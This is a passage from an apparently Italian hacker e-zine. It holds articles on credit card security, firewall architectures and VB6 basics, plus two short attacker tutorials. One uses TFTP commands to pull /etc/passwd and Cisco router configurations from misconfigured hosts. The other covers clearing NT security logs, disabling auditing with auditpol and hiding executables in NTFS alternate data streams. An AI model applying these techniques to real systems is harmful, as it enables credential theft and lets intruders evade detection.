categorie di persone che lasciano scritti PIN, password, e quant'altro
dovrebbe rimanere segreto, su bigliettini attaccati al monitor...
grazie di esistere!!
Purtroppo l'analisi delle possibili debolezze non si esaurisce qui.
Alcune volte possono raggiungere lo scopo dei piccoli programmi chiamati
"keyloggers" (o "sniffer", se utilizzati in Rete) che provvedono
ottimamente, ed a vostra insaputa, alla registrazione di tutte le
operazioni svolte sulla macchina in cui si trovano... compresa la
successione dei tasti premuti.
Altre volte, invece, al fine di ottenerne il pieno controllo, l'attacker
potra' sfruttare una debolezza del sistema operativo bersaglio ovvero,
per lo stesso scopo, potra' utilizzare una semplice "backdoor"...
o potra', ancora, sfruttare una debolezza del programma che si
occupa della gestione e dell'archiviazione del file (o dei files)
contenenti questi dati.
Come avevo preannunciato all'inizio, questo e' un argomento che, data la
sua difficile generalizzazione, astrazione e la molteplicita' di casi
ipotizzabili, dovrebbe essere trattato partendo da un singolo fatto
concreto. Ma penso (e spero) che l'idea di fondo sia ormai chiara...
A poco serve custodire diligentemente il proprio numero di carta di
credito o la propria password se poi e' sufficiente una piccola falla
nel sistema di sicurezza di un sito "specializzato" in e-commerce per
consentire ad un attacker di acquisire migliaia di codici in un colpo
solo.
Invito chi crede che questa sia soltanto una visione distorta o
ipotetica della realta' dei fatti, a farsi un giro su questi tre links
(i primi tre che mi sono capitati sotto mano... ma ce ne sono molti
altri) e a leggere cio' che e' avvenuto a colossi e non della
"new-economy". Ecco gli url:

http://punto-informatico.it/p.asp?i=31242

http://punto-informatico.it/p.asp?i=32276

http://punto-informatico.it/p.asp?i=32383

(Per chi non lo sapesse, Punto Informatico (http://punto-informatico.it)
e' un ottimo news-magazine, completamente gratuito, che si occupa di
informare giornalmente i suoi abbonati di quanto accade sulla Rete.
Una visita non puo' che farvi bene...).

Come si e' visto, quindi, l'avvento della crittazione dei dati, ha
finito per risolvere soltanto la maggior parte dei problemi legati alle
intercettazioni "al volo". Non ha assolutamente risolto, pero', il
problema della sottrazione e riutilizzazione di password e numeri di
carte di credito. Possiamo dire che l'effetto e' stato quello di
spostare il campo su cui avviene la battaglia, ma la guerra e' ancora
lontana dal concludersi.


° Dal mondo virtuale a quello "reale"...

Pur potendo sembrare strano e contraddittorio con quanto detto finora,
sono costretto a "rivelarvi" che, utilizzare la carta di credito sulla
Rete, risulta sempre il modo piu' sicuro per compiere acquisti.
Puo' sembrarvi strano perche' i cosiddetti "mezzi d'informazione di
massa"
non perdono occasione per intraprendere delle vere e proprie
crociate sull'inaffidabilita' e sulla insicurezza di queste tipologie
di transazioni, analizzando troppo spesso il problema in maniera
superficiale e poco obiettiva.
In questi casi, troppo spesso si "dimentica" di ricordare che, per
impossessarsi dei 16 numeri della carta e dei 4 della scadenza (questi,
infatti, sono gli unici numeri che servono), non occorre nessuna
conoscenza tecnica informatica e, soprattutto, che l'azione risulta
perfettamente lecita (attenzione... si sta parlando dell'acquisizione,
non del riutilizzo).
Esempio classico e' quello del cameriere che, al ristorante, va via con
il conto e la vostra carta di credito... e non penso sia particolarmente
complicato appuntare, in tutta calma e lontano dai vostri occhi, una
manciata di numeri.
Per non parlare del fatto che, per autorizzare la transazione, i dati
vengono trasferiti dal negoziante alla Banca attraverso un modem
(proprio come avviene su Internet) e che, per di piu', ogni volta che
effettuate un acquisto con carta di credito, una copia della ricevuta
(contenente i 20 numeri utili per il suo riutilizzo), viene da voi
firmata e lasciata al negoziante... Questa si che e' sicurezza!!

Altro discorso e' alla base del mondo virtuale.
Qui, oltre ad una piu' volte ricordata ed ovvia abilita' informatica,
sono previste numerose fattispecie penali che si preoccupano di
disciplinare non solo il compimento del fatto illecito, ma anche il
"semplice" tentativo di impossessarsi dei numeri.
E' appena il caso di ricordare quella prevista dall'art. 615 ter del
codice penale (come riformato dal legislatore con legge 547/1993)
sull'accesso abusivo a sistemi informatici; l'art. 617 quater del
codice penale sull'eventuale danneggiamento del sistema... e,
naturalmente, l'art. 12 della legge 197/1991 sull'abuso di codici di
carte di credito.

Tirare le somme, a questo punto, e' un gioco da ragazzi.
Attenzione pero' ora a non esagerare nemmeno nel senso opposto!!
Ovvero, non immettete il vostro numero di carta di credito nel primo
sito che vi capita sotto gli occhi, ma sceglietene uno che goda di una
buona affidabilita' sia nella gestione degli ordini che dei pagamenti.
Non e' nuova, infatti, la notizia di siti creati appositamente per
"rubare" numeri di carte di credito ed imbattersi in uno di questi
non e' poi un'ipotesi troppo remota. :) Aprite gli occhi, dunque!!

In genere, potete tranquillamente affidare i vostri dati a tutti quei
siti che esplicitamente dichiarano di utilizzare sistemi tecnologici di
sicurezza a garanzia dei dati immessi, che assicurano il vostro
diritto di recedere dall'acquisto nei modi e nelle forme previste dalla
legge, che tutelano la vostra privacy, che in modo chiaro quantificano
l'ammontare dovuto per le spese di spedizione (che, molte volte, arriva
a gonfiare cosi' tanto il prezzo da non renderne piu' conveniente
l'acquisto) e dichiarano i modi ed i tempi di consegna della merce,
badate alla facile reperibilita' del rivenditore (e-mail, telefono, fax)
e, soprattutto, leggete il contratto in tutte le sue clausole prima
di sottoscriverlo!!
Questi sono solo dei piccoli accorgimenti, siate attenti e vigili perche'
in gioco ci sono i vostri dati personali!


° Dove andremo domani?

Il problema dei pagamenti, converrete, e' stato finora il piu' grande
ostacolo alla diffusione del commercio elettronico.
Numerose sono le iniziative volte a superare il problema, escogitate da
tutte le parti interessate all'esplosione di questo "mercato" (ebbene
si', anche on-line nessuno fa niente per niente!!).
Degne di nota, almeno a mio avviso, sono solo due.
La prima consiste nella nascita, per ora solo in America, dei payament
service providers (PSPs), ovvero di agenzie che, dopo aver ricevuto un
versamento iniziale da parte dell'utente, provvedono a pagare le sue
successive transazioni telematiche. Come si vede, il "trucchetto" sta
nell'eliminare l'immissione dei dati nei sever del venditore, evitando
cosi' il possibile furto dei codici della carta di credito.
Questa opportunita' e' stata "fiutata" anche dai gestori di telefonia
fissa che provvederanno invece all'addebito diretto in bolletta.
La seconda iniziativa degna di nota e' quella proposta dall'American
Express. In pratica, nel momento in cui l'utente acquista la merce,
immette un numero di carta di credito "temporaneo" e valido solo per
quella transazione. Una volta ricevuto quel numero, il rivenditore si
mette in contatto con il fornitore della carta (per ora solo American
Express) e, solo dopo aver controllato la presenza di credito, ne
autorizzera' la transazione. Il fornitore della carta "temporanea"
provvedera' poi a rigirare l'importo della transazione sul numero di
carta di credito "reale" dell'utente.
Certo la transazione risulta molto piu' lenta, ma la sua affidabilita'
non ha paragoni.

Io mi fermo qui. Spero che l'articoletto, seppur generico, sia stato
interessante ed istruttivo...
Cosa mi resta da dire se non augurarvi di fare buon shopping!!!
(siamo pure vicini al Natale!!)...


[ The Jackal ]

.-----------------------------------------------------------[ Security ]-----.
| I FIREWALL |
*-----------------------------------[ H4mBuck3r ]--[frankyno@tiscalinet.it]--*

Ed ecco a voi un altro "pallosossimo" articolo sul tcp-ip... :P in particolare
analizziamo il funzionamento di un firewall,xche'dite? uhmm spero lo sappiate
che quasi tutte le reti locali sono protette da un firewall e il modo migliore
x superarlo e cercare di capire come funziona.(etica rulezz:))

Prima pero' facciamo una panoramica del xche' c'e' bisogno di un firewall
nella propria rete, come saprete (bene spero :P) molte applicazioni molto
frequenti hanno un basso livello di sicurezza come ad esempio Telnet Ftp pop3
che trasmettono le password in chiaro e un semplicissimo sniffer o
"Analizzatore di rete" (che fa' piu' figo) le puo' facilmente intercettare e
ricostruire donando cosi' un sorriso :) allo sniffatore di turno che si
ritrovera' nelle mani un bel account (se ha culo di root) in poco tempo, alla
faccia delle notti passate col vecchio "john" in poppa che cercava
corrispondenze e serate intere passate a "sortare" (termine coniato poco fa')
file dizionario.

Certo se finalmente l'utente medio imparasse ad usare come password caratteri
alfanumerici non di senso compiuto....sarebbe un altro discorso. :(
Anche spoofare come ben sapete e' abbastanza facile,far si' di essere un
altro host magari "amico" e' sempre una buona tecnica non patchabile e x
questo ancora utilizzabile,o pensate a come sia facile nel protocollo SMTP
mandare una fake mail con magari l'indirizzo di Zio (porco) Bill, anche se
chiunque con un po'di conoscenza del tcp-ip riuscirebbe a distinguere una
fake da una vera. Un altro problema non patchabile e che puo' rendere
veramente una rete molto scarsa nella sicurezza e' l'amministratore, molti (e
dico MOLTI) sysadmin lasciano il loro sistema in balia degli hacker o
addirittura lasciano i vari account di default,tutto questo naturalmente
deriva dall'inesperienza o la scarsa volonta' di andare a cercarsi
periodicamente le nuove patch x i bug appena scoperti nel proprio O.S.
(se cercate bene riuscirete addirittura a trovare un host rootabile col PHF!!)

I FIREWALL

Un firewall fornisce un servizio di "confine" tra la rete locale e il mondo
esterno, e' infatti generalmente posizionato tra le due:
______
|---------| / \
| | |------------| / \
| rete | | | / rete \
| locale |===========| Firewall |===========/ \
| | |------------| \ esterna /
|---------| \ /
\ /
\______/


NdA non sono mai stato un granche' con gli ASCII (^_^)


Bisogna pero' anche assicurarsi che tutte le connessioni da e verso la rete
passino per il firewall se no e' inutile! :) I piu' comuni tipi di
implementazioni che possono essere applicate ad un firewall sono:

# Negare l'accesso a tutti quei servizi che non sono esplicitamente
consentiti;

# Consentire l'accesso a tutti quei servizi che non sono esplicitamente
negati.

La scelta piu' sicura ricade decisamente sulla prima implementazione poiche'
non si corre il rischio di far transitare attraverso il firewall dei servizi
o protocolli nuovi.
Un altra funzione molto importante che il fw svolge e' quella di nascondere
le caratteristiche della rete alla quale si antepone bloccando servizi come
ad esempio NIS o il finger che rivelerebbero importanti informazioni
sfruttabili x compiere un attacco; di solito dispone anche di funzioni di
reporting e di allarme utili all'amministratore x essere sempre al corrente
della situazione della rete e di essere avvisato in caso di un attacco.
Naturalmente un firewall non deve (e' di solito non e')essere l'ultimo
ostacolo x accedere ai dati di una rete ma anche la propria rete deve essere
"sicura", deve fare in modo quindi che non ci siano possibilita' di aggirare
il fw collegandosi direttamente ad un modem di un host interno e possibilmente
usare la cifratura dei dati in trasmissioni protette e usare uno schema di
autenticazione come ad esempio Kerberos.

Un firewall puo' essere fondamentalmente implementato in 5 modi:

°*°> Firewall a filtro di pacchetti

°*°> Firewall a livello di applicazione con proxy

°*°> Firewall a livello di circuito

°*°> Firewall a filtro di pacchetto dinamico

°*°> Firewall x conto del kernel

====> Fw a filtro di pacchetti

Iniziamo con i fw a filtro di pacchetti che e' la implementazione meno
recente delle altre ma che permette una discreta flessibilita' nel controllare.
i pacchetti in uscita e entrata,infatti questo tipo di implementazione altro
non fa' che confrontare l'intestazione del protocollo di trasporto e
intestazione ip con delle regole (rules) stabilite anticipatamente permettendo
o negando l'accesso ad un tipo di protocollo o ad uno o piu' IP.
(Prendete come esempio il Conseal pc Firewall)
Naturalmente ci sono dei vantaggi e degli svantaggi nell' usare questo tipo
di firewall,

Vantaggi:

* non e' richiesta una particolare configurazione dei computer client,
* vengono eseguite poche verifiche sui pacchetti fornendo cosi' ottime
prestazioni;

Svantaggi:

* non si possono memorizzare nella cache del fw le pagine web
* naturalmente operando a livello di pacchetti non si possono discriminare
alcune funzioni utili a livello applicativo come ad esempio il put di
ftp abilitando soltando il get
* le regole stabilite x i pacchetti valgono solo x il flusso che
attraversa il fw lasciandolo cosi' esposto agli attacchi esterni.
*

====> Fw a livello di applicazione con proxy

I Fw a livello di applicazione verificano i dati a livello applicazione prima
di permettere la connessione tra due host,questo tipo di fw di solito
gestiscono anche servizi proxy.

Un server proxy funziona da tramite per un client che si connette ad un
server esterno; una volta configurato il client esso si comporta come se
stesse comunicando direttamente con il server esterno permettendo pero' solo
le richieste precedentemente configurate "ammesse", una volta riconosciuta
come valida la domanda di un servizio come ad esempio Telnet,Ftp,Smtp,Pop3,
Http,Socks viene inoltrata al server destinatario,e questo rispondera' al
proxy poiche' il client e' invisibile ad esso (mamma mia che spiegazione eh?);
i server proxy acquisiscono dal client le pagine web richieste immagazzinadole
nella cache,quando un client proxy chiede una determinata pagina web il proxy
verifica la sua presenza prima nella cache interna.
Se viene trovata verra' spedita al client la copia locale risparmiando cosi'
tempo di visualizzazione al client e collegamenti esterni del server stesso.

Vantaggi:
* viene nascosto alla rete esterna lo schema degli indirizzi di quella
interna,
* tutte le comunicazioni consentite passano attraverso il proxy,bloccando
cosi' accessi a reti esterne,
* vengono loggate tutte le richieste di connessione passanti x il proxy
* si possono configurare in maniera tale da nascondere ai client esterni
richieste di servizio a un server interno passandole come richieste al
proxy stesso


Svantaggi:
* I servizi svolti dal proxy vengono eseguiti sulla stessa porta
dell'applicazione supportata,impedendo cosi' l'implementazione del
servizio stesso sul Fw.
* Poiche' tutti i dati in ingresso vengono elaborati due volte (una dal
proxy e una dal client reale) si possono avere dei cali di prestazioni
* Bisogna nella maggiorparte dei casi configurare a mano il client x
consentire l'utilizzo del proxy


====> Fw a livello di circuito

I Fw a livello di circuito utilizzano la seguente ipotesi sul traffico della
rete: ogni pacchetto che transita nel firewall e' una richiesta di connessione
oppure dei dati che devono attraversare la connesisone corrente tra il client
e un server.In pratica il Fw altro non fa' che, una volta avvenuta una
connessiono TCP, accertare che avvenga un corretto handshake TCP a tre vie,
se cio' non avviene la connessione ciene chiusa.

Viene gestita una tabella delle connessioni valide x ogni connessione avvenuta
che comprende lo stato della sessione corrente e le informazioni di sequenza
sia x il client sia x il sistema host.
Interpretando le informazioni di sequenza ci si puo' accorgere se un altro
host sta cercando di inserire i suoi pacchetti nel flusso di un altra
connessione.Chiusa la sessione viene eliminata la voce corrispondente dallo
stato della sessione.

Vantaggi:
* Puo' esistere una discriminazione delle connessioni selettiva
sull'intera rete o su un singolo host,
* Elevata efficenza nel gestire il traffico sul Fw,

Svantaggi:
* Limita la protezione al solo TCP x cui una transazione avvenuta in UDP
non viene considerata connessione e non viene stabilita una sessione,
* Non offre funzionalita' ulteriori quali ad esempio la memorizzazione in
cache delle pagine web,
* non e' in grado di gestire regole x protocolli di alto livello,


====> Fw a filtro di pacchetti dinamici

E' una combinazione dei servizi offerti dai Fw a livello di applicazione con
quelli a filtro di pacchetti,con ulteriori vantaggi come la possibilita' di
cambiare regole di sicurezza anche durante il funzionamento del Fw stesso.

E' in grado anche di gestire le connessioni UDP, come affermato in precedenza
le connessioni UDP non generano una sessione fra il client e il sever x cui
risulta molto piu' difficile gestirle ma il Fw a filtro di pacchetti dinamici
ricorda tutti i pacchetti UDP che lo attraversano.Quando l'host risponde il
Fw controlla che il pacchetto sia destinato al richiedente originario, in
quel caso permette il transito del pacchetto altrimenti ....no!(azz pure
spiritoso sto' diventando :D),anche se l'host destinatario impiega molto tempo
x rispondere,il pacchetto non viene considerato valido e ne nega il transito.

====> Fw x conto del kernel

Questo tipo di implementazione di un Fw viene effettuata a livello del kernel
del sottostante S.O.,quando riceve una richiesta di sessione viene generato
uno stack TCP-IP,questo stack contiene solo i proxy del protocollo necessari
x il tipo di sessione richiesta.Questo avviene naturalmente x ogni nuova
sessione.

Una volta che i dati sono trasmessi verso i vari livelli dello stack della
rete, il pacchetto puo' essere controllato in ogni livello dello stack e se
non viene rispettata una qualsiasi regola anche di un solo livello il
pacchetto viene scartato.

#+°+#+°+# Zona Demilitarizzata #+°+#+°+#

Un'altra implementazione molto usata e' chiamata "Zona Demilitarizzata",in
questa situazione,tutti i servizi disponibili ad un client esterno sono
situati in ramo separato: (un altro ASCII stupido..) :-P

______ _______
/ \ / \
| | / \
| router |################################/ Internet \
| | \ /
| | \ /
\______/ \_______/
#
# ____ ____
# / \ / \
# | | | |
# | | | |
# | M | | W |
# | A | | E |
___#____ | I | | B |
/ \ | L | | |
/ \ | | | |
| | \ / \ /
| Firewall |#########################################
| |
\ /
\_______/
#
#
#
#
#
#
#
__#__
_/ \_
/ rete \
| locale |
\_ _/
\_____/


il vantaggio di questa implementazione e' che l'accesso a questo ramo e'
concesso solo attraverso il Fw e cosi' facendo si possono applicare le regole
del Fw a tutto il traffico che lo attraversa garantendo che solo i flussi
desiderati raggiungano i server della zona demilitarizzata.

La rete locale e' posizionata dietro il Fw quindi eliminando tutti il server
che consentono l'accesso a client esterni e spostandoli nella zona
demilitarizzata non occorre concedere ai client esterni di poter comunicare
con un host della rete interna.
E' possibile pero' che un server della zona demilitarizzata abbia bisogno di
un servizio presente in un host interno,a questo punto quindi e' bene definire
delle regole che permettano a questi host di comunicare attraverso il Fw, il
tutto e' reso sicuro poiche' i server della zona demilitarizzata sono
controllati dal Fw permettendo cosi' l'accesso ai soli flussi autorizzati.

Si puo' anche implementare un servizio proxy sul Fw facendo cosi' in modo che
tutte le richieste di accesso esterno da parte degli host interni passino x
il proxy.


OHHHH ce l'abbiamo fatta...(chi c'e' arrivato) Approfitto di questo spazio x
salutare i chan #olbia #aisprod e #phreak.it di IRCnet e #ahccc di
AZZURRAnet in particolare il caro vecchio OldirOn61 e il Que che ogni tanto
si fanno vedere....(^_^) TheDuke (ciao dukino) Debian e Chrome x la loro
autorevolezza :-PP

ahhh dimenticavo Cr4zyM4n che finalmente c'e' l'ha fatta a riprendersi il
chan!!!
Bye alla ProXyma

[ H4mBuck3r ]

.------------------------------------------------------------[ Hacking ]-----.
| (MINI) TFTP TUTORIAL |
*---------------------------------------[ MainMan ]--[dosshell@freemail.it]--*

Soggetto : TFTP, Trivial File Transfer Protocol

Porta : 69 UPD

Caratteristiche : Serve per avviare dispositivi di rete (es. router) o per il
boot di postazioni prive di disco.

Uso: Se non configurato in modo corretto si puo utilizzare il seguente
protocollo per trasferire i file /etc/passwd sul proprio sistema, utile
per avere l'elenco dei nomi utente (per un eventuale brute forcing ) e
nel caso in cui non venga utilizzato etc/shadow pure dei hash delle
password ! Eventualmente da questo (sempre tramite il download) si
possono ricavare informazione utili appunto sui router...

__________________________________________________
Download via TFTP del file di configurazione Cisco
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Sfruttare TFTP per scaricare i file di configurazione puo essere molto
semplice se il sysadm non ha attivato qualche filtro che impedisca l'accesso
al TFTP o ha usato nomi banali per il file .cfg . Spesso porta lo stesso nome
del relativo DNS.

Esempio (ip e dns inventato) :
Ip: 144.145.146.147

Facciamo na ricerca DNS e scoprimo che corrisponde a : tampax.132.rtr

Quindi facciamo:

[root@pizza] tftp
> connect 144.145.146.114
> get tampax.132.rtr.cfg
> quit

Questo file conterra' probabilmente i vari nomi comunita' ed eventuali liste
di controllo degli accessi.

Ok, la prossima volta parlero meglio dei router Cisco, bye...

[ MainMan ]

.------------------------------------------------------------[ Hacking ]-----.
| OCCULTARSI SU NT |
*---------------------------------------[ MainMan ]--[dosshell@freemail.it]--*

Tratterò due argomenti I LOG e CELARE DEI FILEZ.

< LOG >

Allora i sitemi di "log" su NT posso essere vari ecco i + conosciuti :
-EVENT LOG
-AUDIT

NT crea il suo bel file di log sotto %systemRoot%\system32\config.
I files hanno estensione evt (SecEvent,AppEvent,SysEvent).

EVENT LOG
Un possibile modo di "fare le pulizie" è utilizzando l'Event Viewer, ma NON
FATE "CAZZATE" ,perchè se lo modificate comparira nel event log che è avvenuta
una modifica... quindi e come dire : "ehi sei stato hackkato"

Qui ci vengono in aiuto altri programmi come elsave che permette (se si hanno
le giuste autorizzazioni ) di ripulire tranquillamente il Security log.

elsave : www.ibt.ku.dk/jesper/ (sotto la sezione NT tools)

AUDIT
Da qui si capisci che tipo si sysadm si ha di fronte se capisce qualkosa
l'auditing sarà attivato se invece pensa : "a che mi serve, mi rallenta solo
il sistema"
potete intuire il suo quoziente intellettivo.....
Questo registra (in base a come è impostato) delle nostre azioni, è this
isn't good. :)) con auditpol (viene dal Resource kit) è possibile
disattivarlo e riattivarlo dopo avere finito, con le impostazioni precedenti
(non bisogna saperle ci pensa auditpol a conservarle.

i comandi sono X:\>auditpol /disable
e per riattivarle /enable

< NASCONDERE I FILE >

Voi dite : beh si fa attirib +h [pizza] però se l'opzione "Mostra tutti i
file è attivata"
non serve a niente...
Io rispondo: beh, se lo sapete, cosa lo dite a fare ???? :)))))

Allora ho procedete che la classica tattica di dare ai file nomi finti di
sistema o fate....

Lo Streaming dei file di NTFS

SE nel sistema è installato il NTFS (NeTwork File System) possiamo usare il
seguente metodo. Prendiamo un qualunque file. Ad esempio ciao.001 (ehi non
questo, uno che esiste ) . Ora creiamo uno stream(*^1) usando cp(*^2).
Procediamo :

cp cattivo.exe ciao.001:cattivo.exe

Ok fatto, se ora vogliamo estrarre il file facciamo...

cp ciao.001:cattivo.exe cattivo.exe

Una volta svolto lo stream la data di modifica di ciao.001 cambia, ma non la
sua dimensione !! :)
Per questo un file stram è difficile da trovare. Il file nascosto puo essere
eseguito senza essere estratto (NON CON CMD.EXE) ma utilizzando il commando
start

start ciao.001:cattivo.exe

*^1 = stream: meccanismo per aggiungere attributi ad un file senza
ristrotturare il file system.
*^2 = cp: è l'utilità POSIX presente nel Resource Kit di WIn.NT

ok, prossimamente su questi skermi la seconda parte.

byz
[ MainMan ]

.--------------------------------------------------------[ ProGramMinG ]-----.
| VB6 TUTORIAL |
*------------------------------------------[ ValK ]--[valkzone@infinito.it]--*

La ValK Pruduction Present
-=<( Visual Basic 6 (tm) )>=-
Version 0.99beta
GUIDA DI RIFERIMENTO

]--- INDEX ---[
WHAT'S NEW IN THIS VERSION
INTRODUZIONE
IL LINGUAGGIO
LA SUA STRUTTURA
LA SUA SINTASSI
INFO BASE
PROGETTO
FORM
MODULO
CLASSE
I COMADI BASE
LE VARIABILI
I TIPI DI DATI
INFO BASE
I "TYPE"
ASSEGNAZIONE DEI VALORI
OPERAZIONI SUI VALORI
GLI OPERATORI
STRINGHE E NUMERI
LE BOX
MESSAGEBOX
INPUTBOX
I FORM
GLI OGGETTI
GLI EVENTI
PICTUREBOX
PROPRIETA'
METODI
LABEL
PROPRIETA'
METODI

]--- FINE INDEX ---[

]--- WHAT'S NEW IN THIS VERSION ---[

EH EH EH questa e' alla prima versione beta ;P
non molto completa ma cmq divina (in quanto
io sono il dio del vb ;P [questo per asfalto] )


]--- INTRODUZIONE ---[

Eccoci qui, dopo un lungo tempo di pausa ricomincio
a scrivere su cio' che poi' amo, LA PROGRAMMAZINE
ebbene si sono un patito di programmazione, il potere
di creare dalle righe di codice, al senzazione quando
complilo, l'orgasmo di quando lo lancio [ndr. NO NON
SONO UN MANIACO SESSUALE].
Cmq cominciamo a sfatuare il fatto che il VB sia un
linguaggi

  
o con programmazione ad oggetti infatti non
e' assolutamente cosi', il VB infatti e' un linguaggio
object oriented (orientato ad oggeti) ma non e' ad oggetti
puro, la differenza? che mentre il c++ ha degli oggetti
definiti che e' possibile gestire dinamicamente(es. copiare
una classe di oggetti e mantenerne le proprieta') il VB
non lo permette.

-= quello che intendo fare con questa guida e' darvi un
riferimento non intendo assolutamente sostituirmi al
manuale del programmatore del VB =-

]--- IL LINGUAGGIO ---[

il vb e' un linguaggio strutturato, come il c ha un ciclo
che controlla su quale oggetto sta' agendo l'utente solo ke
(per fortuna) a noi non tokka programmare questo ciclo infatti
lo fa' da solo il compilatore vb senza farcelo vedere.
la cosa affascinante del vb e' che un linguaggio morto come
il BASIC torna in vita tipo frankestain nel romanzo di mary
shelly dando vita ad un'interfaccia semplice da usare e completa
nel suo insieme con la possibilita' di esparderlo programmando noi
stessi gli "oggetti".

]----> LA SUA STRUTTURA
la struttura del linguaggio e' orientata agli eventi cio' significa
che il programma genera per conto suo un bel ciclone (nel senzo
di grande ciclo) in cui schiaffa il vostro codice e secondo dove met-
tete la punta del mouse genera l'evento ;)
]----> LA SUA SINTASSI
molti di voi ricorderanno il buon vekkio qbasic bhe' scordatevelo
la sintassi dei comandi e' da affincarsi al comando specifico, cioe':

OGGETTO: Controllo Pulsante
EVENTO: click
CODICE: <qui ogni comando ha una sua sintassi ;))PPPP >

]--- INFO BASE ---[

PROGETTO: Ambiente di lavoro in cui mettete FORM,
MODULI, e CLASSI

FORM: maskera grafica in cui piazzate e sistemate
gli oggetti

MODULO: Libero sfogo alla programmazzione! infatti
qui non esiste grafica utile per scrivere
routine e funzioni utilizabili in + progetti

CLASSI: E' come il form senza grafica utile per
programmare oggetti non visuali, permette
la creazione di proprieta' ed azioni (routine)

]--- I COMANDI BASE ---[

per scrivere tutto sui comandi ci vorrebbe un'eternita'
cmq mi riprometto di scrivere pikkole dispenze per ogni
oggetto base, ora vi illustro i comandi base, quelli quindi
di definizione delle variabili ;))))PPP
ecco alcune info base:

ROUTINE: o Sub insieme di istruzioni che formano
il codice dell'evento.

]-----> LE VARIABILI
]-----> I TIPI DI DATI

ecco i tipi base con cui potete dikiarare una variabile:

String ----> Contenitore testo
Integer ---> '' Numeri Interi
Long ------> '' Numeri Interi oltre 32756 (Long)
Boolean ---> '' Vero/Falso
Byte ------> '' Byte
Currency --> '' Valuta
Date ------> '' Data
Double ----> '' Numeri Precisione doppia
Single ----> '' Numeri Virgola Mobile
Variant ---> '' che puo' contenere ognuno dei
dati sopra esposti

]-----> INFO BASE

per dikiarare le variabili si hanno diverse possibilita':

1 Dim
2 Redim
3 Private
4 Public

1 ----------> DIM

SINTASSI:
dim <nome variabile> as < tipo variabile >

dichiara una variabile all'interno di una routine
con validita' solo nell'ambito della routine in
cui e' dichiarata.
N.B. va' dichiarata all'inizio della routine

2 ----------> REDIM

SINTASSI:
redim <nome variabile> as < tipo variabile >

ridichiara una variabile all'interno di una routine
con validita' solo nell'ambito della routine in
cui e' dichiarata.
N.B. Per non generare errori la variabile deve
essere dichiarata all'inizio della routine
e ridichiarata durante la sub

3 ----------> PRIVATE

SINTASSI:
private <nome variabile> as < tipo variabile >

dichiara una variabile all'interno di un Form o modulo
con validita' solo nell'ambito del form o modulo in
cui e' dichiarata.

4 ----------> PUBLIC

SINTASSI:
public <nome variabile> as < tipo variabile >

dichiara una variabile all'interno modulo con
validita' nell'ambito di tutto il progetto in
cui e' dichiarata.

N.B. DIKIARAZIONI MULTIPLE!
SINTASSI:

< DIKIARAZIONE > <NOME VARIABILE 1> as < TIPO VARIABILE >,
<NOME VARIABILE 1> as < TIPO VARIABILE >, <NOME VARIABILE 1> as
< TIPO VARIABILE >, ETC.

]-----> I "TYPE"

Cos'e' un type? bhe e' un "tipo" dichiarato dall'utente che possiede
delle proprieta' dikiarate in fase di definizione.

SINTASSI:
type < nome tipo >
< nome prorieta' > as < tipo dati >
end type

ma come lo uso?
bhe io faccio cosi':
nel form o nel modulo dikiaro una variabile col tipo che ho definito
cosi' se il mio tipo definito era "prova1"
dikiarero' la nuova variabile cosi'

public < variabile > as prova1

oppure

private < variabile > as prova1
e la nostra < variabile > avra' tutte le proprieta' del
tipo da noi definito.
semplice no... ;P

]-----> ASSEGNAZIONE DEI VALORI

ok questa e' la parte piu' bella ;P
l'assegnazione di valori alle variabili!
ok vado subito con gli esempi pratici!!!!

sub ValK()
dim a as long, b as long, c as long
'assegnazione di a
a=5
'assegnazine di b
b=4
'assegnazione di c
c=a+b
end sub

in questo esempio assegno ad A il valore 5 as B il valore
4 e a C l'addizione di A e B

lo stesso di per le stringhe
solo che il valore va' rakkiuso
tra virgolette

es.
dim stringa as string
stringa=" ValK RuleZ "

]-----> OPERAZINI SUI VALORI

Ecco la sezione dedicata alle operazioni sui valori.

]------> GLI OPERATORI

"+" addizione aritmetica di due valori numerici
"-" sottrazione aritmetica di due valori numerici
"*" moltiplicazione aritmetica di due valori numerici
"/" divisione aritmetica di due valori numerici
"\" divisione aritmetica di due valori numerici che
restituisce solo gli interi
"&" addizione logica di due stringe il risultato
e' l'unine delle due stringhe
"xor" esclusione lodica di due interi


]------> STRINGHE E NUMERI

Ok belli ora passiamo alle operazioni sulle stringhe e
variabili numeriche.
ok
ESEMPIO 1:
sub ValK()
dim a as long, b as long, c as long
'assegno a
a=5
'assegno b
b=10
'assegno c
c=a+b ' e qui si ottiene l'addizione
' aritmetica tra a e b con il "+"
c=a-b ' e qui si ottiene la sottrazione
' aritmetica tra a e b con il "-"
c=a*b ' e qui si ottiene la moltiplicazione
' aritmetica tra a e b con il "*"
'etc. etc. con tutti gli operatori artmetici
end sub

ESEMPIO 2:
sub ValK()
dim a as string, b as string, c as string
'assegno a
a="ValK"
'assegno b
b=" RuleZ"
'assegno c
c=a + b ' e qui si ottiene l'unione
' tra le stringhe a e b con il "+"
' otterremo cosi':
' c= "ValK RuleZ"
c=a & b ' e qui si ottiene l'unione
' tra le stringhe a e b con il "&"
' otterremo cosi':
' c= "ValK RuleZ"
end sub

ESEMPIO 3:
sub ValK()
dim a as string, b as long, c as string
'assegno a
a="ValK"
'assegno b
b=5
'assegno c
c=a + b ' qui si ottiene l'errore
' xche' una stringa + un numerico
' genera errore
c=a & b ' e qui si ottiene l'unione
' tra le stringhe a e b con il "&"
' otterremo cosi':
' c= "ValK5"
' senza generare errori
end sub

]--- LE BOX ---[
le box sono delle finistre di messaggio in cui
si puo' fare l'inserimento di dati e inserirli
in variabili oppure la stampa a video di un
messagio con il testo desiderato.

]------> MESSAGEBOX

si usa per visualizzare un messaggio a video tramite finestra
di avviso

SINTASSI:
MsgBox(< prompt >,< buttons >,< title >)
< prompt >: messaggio che si desidera
visualizzare
< buttons >: tipo di messaggio che si desidera
visualizzare

ECCO RIPORTATA LA TABELLA DEI VALORI PER < BUTTONS >
Costante Valore Descrizione
vbOKOnly 0 Visualizza solo il pulsante OK.
VbOKCancel 1 Visualizza i pulsanti OK e Annulla.
VbAbortRetryIgnore 2 Visualizza i pulsanti Termina, Riprova,
e Ignora.
VbYesNoCancel 3 Visualizza i pulsanti Sì, No e Annulla.
VbYesNo 4 Visualizza i pulsanti Sì e No.
VbRetryCancel 5 Visualizza i pulsanti Riprova e Annulla.
VbCritical 16 Visualizza l'icona di messaggio critico.
VbQuestion 32 Visualizza l'icona di richiesta di avviso.
VbExclamation 48 Visualizza l'icona di messaggio di avviso.
VbInformation 64 Visualizza l'icona di messaggio di
informazione.
< title >: Titolo della finestra


